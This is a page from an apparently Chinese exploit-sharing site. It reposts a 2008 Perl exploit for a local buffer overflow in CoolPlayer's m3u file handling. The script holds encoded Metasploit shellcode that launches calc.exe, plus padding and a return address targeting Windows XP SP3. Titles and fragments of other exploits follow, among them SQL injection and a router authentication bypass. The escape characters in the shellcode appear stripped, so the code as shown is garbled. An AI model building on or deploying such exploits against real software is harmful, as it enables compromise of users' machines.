CoolPlayer m3u File Local Buffer Overflow Exploit

所属分类: 网络安全 / Exploit 阅读数: 94
收藏 0 赞 0 分享
#!/usr/bin/perl
# k`sOSe - 07/29/2008 use warnings;
use strict; # http://www.metasploit.com
# EXITFUNC=seh, CMD=c:WINDOWSsystem32calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "xd9xcaxd9x74x24xf4x5exb8xf5x65x2dxfbx31xc9xb1" .
"x24x31x46x19x83xeexfcx03x46x15x17x90xd1x13x93" .
"x5bx2axe4x90x19x16x6fxdaxa4x1ex6excdx2cx91x68" .
"x9ax6cx0ex88x77xdbxc5xbex0cxddx37x8fxd2x47x6b" .
"x74x12x03x73xb4x58xe1x7axf4xb7x0ex47xacx63xeb" .
"xcdxa9xe0xacx09x33x1dx34xd9x3fxaax32x82x23x2d" .
"xaexb6x40xa6x31x22xf1xe4x15xb0xc1x4bx67x4exa5" .
"x25xe3x25x60xf9x60x79x61x72x06x66xd4x0fx8fx9e" .
"xafxf7xd3x5fxc5x57xbcxafx90x53x63x38x3dxa5x11" .
"xb6x6axa6xc1xa4xaex04x59x62x81xf0x2ax23x4exa4" .
"xc7xb2x03x20x4dx28xd7xfaxd1xd1x76x96x8ax3bx1c" .
"x1ex28x44xd4"; print $shellcode .
"x41" x (218 - length($shellcode)) .
"x32x4cx3cx7e" ; # call ebx user32.dll winxp sp3
更多精彩内容其他人还在看

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploi
收藏 0 赞 0 分享

MyBulletinBoard (MyBB)

<?php // forum mybb <= 1.2.11 remote sql injection vulnerability // bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0 赞 0 分享

Acoustica Mixcraft

#!/usr/bin/perl # # Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit # Author: Koshi # # Date: 08-28-08 ( 0day ) # Ap
收藏 0 赞 0 分享

Simple PHP Blog (SPHPBlog)

<? /* sIMPLE php bLOG 0.5.0 eXPLOIT bY mAXzA 2008 */ function curl($url,$postvar){ global $cook; $ch = cur
收藏 0 赞 0 分享

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Arbitrary File Corruptio
收藏 0 赞 0 分享

Dana IRC 1.4a Remote Buffer Overflow Exploit

#!/usr/bin/perl # k`sOSe - 08/24/2008 # This is a useless and not portable exploit code, tested only on my winxp-sp3 VM. # I was loo
收藏 0 赞 0 分享

GeekLog

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print <<INTRO;
收藏 0 赞 0 分享

NoName Script

################################################################################ [ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0 赞 0 分享

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print "
收藏 0 赞 0 分享

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

<html> <head> </head> <body> <b>html code to bypass the webinterface password protection of the Be
收藏 0 赞 0 分享
查看更多